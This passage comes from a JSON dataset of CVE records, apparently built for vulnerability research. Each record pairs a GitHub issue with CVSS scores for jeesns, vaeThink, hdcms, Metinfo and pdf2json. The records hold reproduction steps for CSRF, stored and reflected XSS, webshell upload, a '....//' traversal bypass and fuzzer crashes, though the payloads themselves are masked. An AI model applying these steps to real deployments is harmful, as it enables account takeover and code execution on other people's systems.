  51082. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/9",
  51083. "Repo_new": "zchuanzhao/jeesns",
  51084. "Issue_Created_At": "2019-05-14T07:15:13Z",
  51085. "description": "Jeesns CSRF Vulnerability. There is also no filter for the token and referer check in the global filter, and there is no deletion method, so there is a CSRF vulnerability. Vulnerability recurrence NUMBERTAG First use the A user (admin) to send a Weibo. FILETAG NUMBERTAG Use the B user (jeesns) to comment on the Weibo and bring the admin Weibo delete request. APITAG FILETAG NUMBERTAG When the A user (admin) refreshes the Weibo again, the Weibo will be deleted by the A user without their knowledge. FILETAG It can be seen that the CSRF TEST microblog has been deleted and the CSRF exploit is successful. There is also a CSRF vulnerability when the background administrator adds a new administrator. The poc can be constructed this way. CODETAG When the background administrator accesses this file, the user jeesns is automatically authorized for administrative rights.",
  51086. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51087. "severity": "HIGH",
  51088. "baseScore": 8.8,
  51089. "impactScore": 5.9,
  51090. "exploitabilityScore": 2.8
  51091. },
  51092. {
  51093. "CVE_ID": "CVE-2020-19281",
  51094. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/12",
  51095. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/12",
  51096. "Repo_new": "zchuanzhao/jeesns",
  51097. "Issue_Created_At": "2019-05-14T07:19:09Z",
  51098. "description": "Jeesns Administrator login Store XSS. Vulnerability recurrence NUMBERTAG Open the background login page APITAG NUMBERTAG Fill in the XSS payload APITAG in the username, enter the password as you like, and click Login. FILETAG NUMBERTAG Trigger XSS when the administrator clicks on the member log. FILETAG",
  51099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51100. "severity": "MEDIUM",
  51101. "baseScore": 5.4,
  51102. "impactScore": 2.7,
  51103. "exploitabilityScore": 2.3
  51104. },
  51105. {
  51106. "CVE_ID": "CVE-2020-19282",
  51107. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/11",
  51108. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/11",
  51109. "Repo_new": "zchuanzhao/jeesns",
  51110. "Issue_Created_At": "2019-05-14T07:17:46Z",
  51111. "description": "Jeesns Error Reminder Reflecting XSS. Vulnerability recurrence ERRORTAG FILETAG",
  51112. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51113. "severity": "MEDIUM",
  51114. "baseScore": 6.1,
  51115. "impactScore": 2.7,
  51116. "exploitabilityScore": 2.8
  51117. },
  51118. {
  51119. "CVE_ID": "CVE-2020-19283",
  51120. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/10",
  51121. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/10",
  51122. "Repo_new": "zchuanzhao/jeesns",
  51123. "Issue_Created_At": "2019-05-14T07:16:29Z",
  51124. "description": "Jeesns APITAG Reflection XSS. Vulnerability recurrence APITAG FILETAG",
  51125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51126. "severity": "MEDIUM",
  51127. "baseScore": 6.1,
  51128. "impactScore": 2.7,
  51129. "exploitabilityScore": 2.8
  51130. },
  51131. {
  51132. "CVE_ID": "CVE-2020-19284",
  51133. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/15",
  51134. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/15",
  51135. "Repo_new": "zchuanzhao/jeesns",
  51136. "Issue_Created_At": "2019-05-14T07:22:58Z",
  51137. "description": "Jeesns Group\u2018s Comments Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Fill in the group post comments with XSS payload APITAG FILETAG NUMBERTAG Trigger XSS when viewing posts. FILETAG",
  51138. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51139. "severity": "MEDIUM",
  51140. "baseScore": 5.4,
  51141. "impactScore": 2.7,
  51142. "exploitabilityScore": 2.3
  51143. },
  51144. {
  51145. "CVE_ID": "CVE-2020-19285",
  51146. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/14",
  51147. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/14",
  51148. "Repo_new": "zchuanzhao/jeesns",
  51149. "Issue_Created_At": "2019-05-14T07:21:20Z",
  51150. "description": "Jeesns Group Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Apply for the group and fill in the name XS payload APITAG FILETAG NUMBERTAG The application group needs to be reviewed, and the XSS is triggered when the background administrator views the group application. FILETAG",
  51151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51152. "severity": "MEDIUM",
  51153. "baseScore": 5.4,
  51154. "impactScore": 2.7,
  51155. "exploitabilityScore": 2.3
  51156. },
  51157. {
  51158. "CVE_ID": "CVE-2020-19286",
  51159. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/13",
  51160. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/13",
  51161. "Repo_new": "zchuanzhao/jeesns",
  51162. "Issue_Created_At": "2019-05-14T07:20:15Z",
  51163. "description": "Jeesns Answer Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Answer the question, click on the source in the editor and fill in the XSS payload APITAG FILETAG NUMBERTAG Trigger XSS when viewing the question. FILETAG",
  51164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51165. "severity": "MEDIUM",
  51166. "baseScore": 5.4,
  51167. "impactScore": 2.7,
  51168. "exploitabilityScore": 2.3
  51169. },
  51170. {
  51171. "CVE_ID": "CVE-2020-19287",
  51172. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/16",
  51173. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/16",
  51174. "Repo_new": "zchuanzhao/jeesns",
  51175. "Issue_Created_At": "2019-05-14T07:24:02Z",
  51176. "description": "Jeesns Group Posts Store XSS. Vulnerability recurrence NUMBERTAG Register a user at the front desk and follow the group NUMBERTAG Post, fill in the XSS payload APITAG at the title. FILETAG NUMBERTAG Trigger XSS when viewing group posts. FILETAG",
  51177. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51178. "severity": "MEDIUM",
  51179. "baseScore": 5.4,
  51180. "impactScore": 2.7,
  51181. "exploitabilityScore": 2.3
  51182. },
  51183. {
  51184. "CVE_ID": "CVE-2020-19288",
  51185. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/17",
  51186. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/17",
  51187. "Repo_new": "zchuanzhao/jeesns",
  51188. "Issue_Created_At": "2019-05-14T07:25:03Z",
  51189. "description": "Jeesns Message Store XSS. Vulnerability recurrence NUMBERTAG Register a user at the front desk NUMBERTAG Send a private message to the administrator, fill in the content XS payload APITAG FILETAG NUMBERTAG SS is triggered when the administrator views the private message. FILETAG",
  51190. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51191. "severity": "MEDIUM",
  51192. "baseScore": 5.4,
  51193. "impactScore": 2.7,
  51194. "exploitabilityScore": 2.3
  51195. },
  51196. {
  51197. "CVE_ID": "CVE-2020-19289",
  51198. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/18",
  51199. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/18",
  51200. "Repo_new": "zchuanzhao/jeesns",
  51201. "Issue_Created_At": "2019-05-14T07:26:07Z",
  51202. "description": "Jeesns Album Store XSS. Vulnerability recurrence NUMBERTAG Register a user, open the personal center, and click on the gallery NUMBERTAG Create a new album and fill in the XSS payload APITAG . FILETAG NUMBERTAG Trigger XSS when viewing the album. FILETAG",
  51203. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51204. "severity": "MEDIUM",
  51205. "baseScore": 5.4,
  51206. "impactScore": 2.7,
  51207. "exploitabilityScore": 2.3
  51208. },
  51209. {
  51210. "CVE_ID": "CVE-2020-19290",
  51211. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/20",
  51212. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/20",
  51213. "Repo_new": "zchuanzhao/jeesns",
  51214. "Issue_Created_At": "2019-05-14T07:28:13Z",
  51215. "description": "Jeesns Weibo Comments store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Fill in the XSS payload APITAG in the Weibo comment section. FILETAG NUMBERTAG Trigger XSS when viewing the details of the Weibo. FILETAG",
  51216. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51217. "severity": "MEDIUM",
  51218. "baseScore": 5.4,
  51219. "impactScore": 2.7,
  51220. "exploitabilityScore": 2.3
  51221. },
  51222. {
  51223. "CVE_ID": "CVE-2020-19291",
  51224. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/19",
  51225. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/19",
  51226. "Repo_new": "zchuanzhao/jeesns",
  51227. "Issue_Created_At": "2019-05-14T07:27:13Z",
  51228. "description": "Jeesns Weibo store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Post the Weibo and fill in the XSS payload APITAG . FILETAG NUMBERTAG Trigger XSS when viewing the Weibo. FILETAG",
  51229. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51230. "severity": "MEDIUM",
  51231. "baseScore": 5.4,
  51232. "impactScore": 2.7,
  51233. "exploitabilityScore": 2.3
  51234. },
  51235. {
  51236. "CVE_ID": "CVE-2020-19292",
  51237. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/24",
  51238. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/24",
  51239. "Repo_new": "zchuanzhao/jeesns",
  51240. "Issue_Created_At": "2019-05-14T07:31:22Z",
  51241. "description": "Jeesns Question Store XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post a question and fill in the XSS payload APITAG . FILETAG NUMBERTAG Trigger XSS when viewing the question. FILETAG",
  51242. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51243. "severity": "MEDIUM",
  51244. "baseScore": 5.4,
  51245. "impactScore": 2.7,
  51246. "exploitabilityScore": 2.3
  51247. },
  51248. {
  51249. "CVE_ID": "CVE-2020-19293",
  51250. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/22",
  51251. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/22",
  51252. "Repo_new": "zchuanzhao/jeesns",
  51253. "Issue_Created_At": "2019-05-14T07:29:48Z",
  51254. "description": "Jeesns Article Store XSS. Vulnerability reproduction NUMBERTAG Register a user NUMBERTAG Post the article and fill in the XSS payload APITAG . FILETAG NUMBERTAG Posting an article requires review, and XSS is triggered when the background administrator views the article. FILETAG",
  51255. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51256. "severity": "MEDIUM",
  51257. "baseScore": 5.4,
  51258. "impactScore": 2.7,
  51259. "exploitabilityScore": 2.3
  51260. },
  51261. {
  51262. "CVE_ID": "CVE-2020-19294",
  51263. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/23",
  51264. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/23",
  51265. "Repo_new": "zchuanzhao/jeesns",
  51266. "Issue_Created_At": "2019-05-14T07:30:33Z",
  51267. "description": "Jeesns Article Comments Store XSS. Vulnerability recurrence NUMBERTAG Register a user NUMBERTAG Fill in the article comments with XSS payload APITAG FILETAG NUMBERTAG Trigger XSS when viewing the article. FILETAG",
  51268. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  51269. "severity": "MEDIUM",
  51270. "baseScore": 5.4,
  51271. "impactScore": 2.7,
  51272. "exploitabilityScore": 2.3
  51273. },
  51274. {
  51275. "CVE_ID": "CVE-2020-19295",
  51276. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/21",
  51277. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/21",
  51278. "Repo_new": "zchuanzhao/jeesns",
  51279. "Issue_Created_At": "2019-05-14T07:28:52Z",
  51280. "description": "Jeesns Weibo Topic Reflection XSS. Vulnerability recurrence APITAG FILETAG",
  51281. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  51282. "severity": "MEDIUM",
  51283. "baseScore": 6.1,
  51284. "impactScore": 2.7,
  51285. "exploitabilityScore": 2.8
  51286. },
  51287. {
  51288. "CVE_ID": "CVE-2020-19301",
  51289. "Issue_Url_old": "https://github.com/tingyuu/vaeThink/issues/1",
  51290. "Issue_Url_new": "https://github.com/tingyuu/vaethink/issues/1",
  51291. "Repo_new": "tingyuu/vaethink",
  51292. "Issue_Created_At": "2019-05-14T13:00:14Z",
  51293. "description": "There is an Arbitrary Code Execution Vulnerability. Vulnerability description: There is a vulnerability which allows remote attackers to execute arbitrary code. The user can control the value of the field 'condition' of the database table 'vae_admin_rule', which is used for the parameters of the code execution function in the administrator privilege check module. Payload: ERRORTAG POC: Firstly, we put the payload into the place as follows: FILETAG Then we create a new role group, which has limited privileges: FILETAG And we create a user that belongs to this role group: FILETAG We login as 'test', and it's obvious that user 'test' has no privilege to access any page: FILETAG But the payload has been executed when the system checked the privileges: FILETAG FILETAG",
  51294. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51295. "severity": "CRITICAL",
  51296. "baseScore": 9.8,
  51297. "impactScore": 5.9,
  51298. "exploitabilityScore": 3.9
  51299. },
  51300. {
  51301. "CVE_ID": "CVE-2020-19302",
  51302. "Issue_Url_old": "https://github.com/tingyuu/vaeThink/issues/2",
  51303. "Issue_Url_new": "https://github.com/tingyuu/vaethink/issues/2",
  51304. "Repo_new": "tingyuu/vaethink",
  51305. "Issue_Created_At": "2019-05-14T13:14:44Z",
  51306. "description": "There is an Arbitrary File Upload Vulnerability. Vulnerability description: There is an arbitrary file upload vulnerability which allows remote attackers to execute arbitrary code. The system server does not perform file suffix detection on the administrator avatar upload function. POC: FILETAG FILETAG We change the filename to \"t.php\": FILETAG The webshell has been uploaded: FILETAG FILETAG",
  51307. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51308. "severity": "CRITICAL",
  51309. "baseScore": 9.8,
  51310. "impactScore": 5.9,
  51311. "exploitabilityScore": 3.9
  51312. },
  51313. {
  51314. "CVE_ID": "CVE-2020-19303",
  51315. "Issue_Url_old": "https://github.com/houdunwang/hdcms/issues/6",
  51316. "Issue_Url_new": "https://github.com/houdunwang/hdcms/issues/6",
  51317. "Repo_new": "houdunwang/hdcms",
  51318. "Issue_Created_At": "2019-06-29T01:16:39Z",
  51319. "description": "There is an Arbitrary Code Execution vulnerability. In hdcms NUMBERTAG attacker can upload evil file via PATHTAG which leads to Arbitrary Code Execution vulnerability. FILETAG FILETAG FILETAG",
  51320. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  51321. "severity": "HIGH",
  51322. "baseScore": 7.8,
  51323. "impactScore": 5.9,
  51324. "exploitabilityScore": 1.8
  51325. },
  51326. {
  51327. "CVE_ID": "CVE-2020-19304",
  51328. "Issue_Url_old": "https://github.com/MRdoulestar/CodeAnalyse/issues/1",
  51329. "Issue_Url_new": "https://github.com/mrdoulestar/codeanalyse/issues/1",
  51330. "Repo_new": "mrdoulestar/codeanalyse",
  51331. "Issue_Created_At": "2020-01-15T02:46:02Z",
  51332. "description": "APITAG NUMBERTAG Directory Traversal. Vulnerability Name: Metinfo CMS Background Directory Traversal Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG The developer use str_replace to delete '../' in APITAG , but this is not safe enough becase it can be bypassed by PATHTAG or '....//'. FILETAG Payload FILETAG FILETAG",
  51333. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  51334. "severity": "HIGH",
  51335. "baseScore": 7.5,
  51336. "impactScore": 3.6,
  51337. "exploitabilityScore": 3.9
  51338. },
  51339. {
  51340. "CVE_ID": "CVE-2020-19305",
  51341. "Issue_Url_old": "https://github.com/MRdoulestar/CodeAnalyse/issues/2",
  51342. "Issue_Url_new": "https://github.com/mrdoulestar/codeanalyse/issues/2",
  51343. "Repo_new": "mrdoulestar/codeanalyse",
  51344. "Issue_Created_At": "2020-01-15T03:10:45Z",
  51345. "description": "APITAG NUMBERTAG Arbitrary File Deletion. Vulnerability Name: Metinfo CMS Arbitrary File Deletion Product Homepage: FILETAG Software link: FILETAG Version NUMBERTAG The indeximg field is also deleted when the column is deleted in ERRORTAG , and the indeximg field can be arbitrarily specified by the background user (in the function of adding a column picture). FILETAG FILETAG POC FILETAG ERRORTAG Then we delete the column, and the file will be deleted as well. FILETAG",
  51346. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  51347. "severity": "CRITICAL",
  51348. "baseScore": 9.8,
  51349. "impactScore": 5.9,
  51350. "exploitabilityScore": 3.9
  51351. },
  51352. {
  51353. "CVE_ID": "CVE-2020-19463",
  51354. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/24",
  51355. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/24",
  51356. "Repo_new": "flexpaper/pdf2json",
  51357. "Issue_Created_At": "2019-05-27T22:42:03Z",
  51358. "description": "Segmentation fault (stack overflow) on vfprintf. Hi, Our fuzzer found a crash due to a stack overflow bug on the function vfprintf. APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Error: PDF file is damaged attempting to reconstruct xref table... Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error: End of file inside array Error: End of file inside dictionary Error NUMBERTAG Illegal character '>' Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Dictionary key must be a name object Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string Error NUMBERTAG Illegal character APITAG in hex string ... Error NUMBERTAG Dictionary key must be a name object NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG IO_default_xsputn APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51359. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51360. "severity": "MEDIUM",
  51361. "baseScore": 5.5,
  51362. "impactScore": 3.6,
  51363. "exploitabilityScore": 1.8
  51364. },
  51365. {
  51366. "CVE_ID": "CVE-2020-19464",
  51367. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/25",
  51368. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/25",
  51369. "Repo_new": "flexpaper/pdf2json",
  51370. "Issue_Created_At": "2019-05-27T22:46:07Z",
  51371. "description": "Segmentation fault (stack overflow) on APITAG Hi, Our fuzzer found a crash due to a stack overflow bug on the function APITAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json PATHTAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A2: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F7AB: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG CE5B: APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG FB1F: APITAG int, Object ) (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address APITAG NUMBERTAG Stack overflow in thread NUMBERTAG can't grow stack to NUMBERTAG ffe NUMBERTAG at NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51372. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51373. "severity": "MEDIUM",
  51374. "baseScore": 5.5,
  51375. "impactScore": 3.6,
  51376. "exploitabilityScore": 1.8
  51377. },
  51378. {
  51379. "CVE_ID": "CVE-2020-19465",
  51380. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/26",
  51381. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/26",
  51382. "Repo_new": "flexpaper/pdf2json",
  51383. "Issue_Created_At": "2019-05-27T23:08:39Z",
  51384. "description": "Segmentation fault on APITAG Hi, Our fuzzer found a crash due to an invalid read on the function APITAG APITAG URLTAG Valgrind says ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG D NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG FB NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG D9: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B5FA: APITAG , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B3B4: APITAG , APITAG , APITAG , void ) (in PATHTAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG Address NUMBERTAG is not stack'd, malloc'd or (recently) free'd NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG at NUMBERTAG D NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG FB NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG D9: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B5FA: APITAG , APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG B3B4: APITAG , APITAG , APITAG , void ) (in PATHTAG NUMBERTAG by NUMBERTAG main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG Segmentation fault ~~~ Thanks, Manh Dung",
  51385. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  51386. "severity": "MEDIUM",
  51387. "baseScore": 5.5,
  51388. "impactScore": 3.6,
  51389. "exploitabilityScore": 1.8
  51390. },
  51391. {
  51392. "CVE_ID": "CVE-2020-19466",
  51393. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/27",
  51394. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/27",
  51395. "Repo_new": "flexpaper/pdf2json",
  51396. "Issue_Created_At": "2019-05-27T23:09:01Z",
